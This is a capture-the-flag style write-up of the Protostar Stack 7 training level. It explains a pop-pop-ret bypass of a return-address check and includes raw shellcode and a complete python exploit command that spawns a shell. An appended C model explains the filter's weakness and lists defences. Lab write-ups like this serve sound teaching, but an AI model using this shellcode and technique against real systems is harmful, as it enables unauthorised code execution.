Tuesday, November 22, 2016

Exploit Exercises - Protostar Stack 7

In this level, the app checks that the return address does not start with 0xb (0xbxxxxxxx). So I return into a pop pop ret gadget, which loads the next return address from the stack and jumps to it.
Found pop pop ret at: 0x08048492
The payload layout:
| "A" * 80 | pop pop ret address | 8 bytes junk | NOP sled address | NOP sled for bit shifting | Shellcode |
This is the shellcode:
\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80

I loaded the PoC into gdb, set breakpoints and debugged it, and found that the NOP sled starts at 0xbffff698. Now build the PoC:
(python -c 'print "A"*80 + "\x92\x84\x04\x08" + "C"*8 + "\x98\xf6\xff\xbf" + "\x90"*40 +"\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"';cat)
And run it:
(python -c 'print "A"*80 + "\x92\x84\x04\x08" + "C"*8 + "\x98\xf6\xff\xbf" + "\x90"*40 + "\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"';cat) | /opt/protostar/bin/stack7
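Why the check does not stop this payload, as an added example that is not part of the original post: a small C model of the filter, applied to the values quoted above. The check is modelled from the post's description (reject a top nibble of 0xb), and `filter_rejects`, `final_target` and `read_path_bounded` are hypothetical names.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define GADGET 0x08048492u  /* pop; pop; ret address quoted in the post */

/* Assumed model of the level's check, per the post's description:
   reject a return address whose top nibble is 0xb. */
int filter_rejects(uint32_t ret) { return (ret >> 28) == 0xbu; }

/* Follow control flow over the words at and above the saved return slot.
   Only the pop; pop; ret gadget is modelled: it discards two words and
   returns to the third. Returns the final destination. */
uint32_t final_target(const uint32_t *words, size_t n)
{
    size_t i = 0;
    uint32_t pc = words[i++];           /* loaded by the function's ret */
    while (pc == GADGET && i + 2 < n) {
        i += 2;                         /* pop; pop */
        pc = words[i++];                /* ret */
    }
    return pc;
}

/* Hardened input path (hypothetical helper): a bounded read never reaches
   the saved return address, so there is nothing left for a filter to vet. */
int read_path_bounded(char *dst, size_t cap, FILE *in)
{
    if (!fgets(dst, (int)cap, in)) return -1;
    dst[strcspn(dst, "\n")] = '\0';
    return (int)strlen(dst);
}

int main(void)
{
    /* Constructed from the post's values: gadget, 8 junk bytes, stack address. */
    const uint32_t words[] = { GADGET, 0x43434343u, 0x43434343u, 0xbffff698u };
    uint32_t end = final_target(words, 4);
    printf("first hop 0x%08x rejected: %d\n", (unsigned)words[0],
           filter_rejects(words[0]));
    printf("final hop 0x%08x rejected if it were checked: %d\n", (unsigned)end,
           filter_rejects(end));
    return 0;
}
```

The filter only vets the first return address, so an address blocklist is not a substitute for bounding the read; a non-executable stack and stack canaries cover what the blocklist misses.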
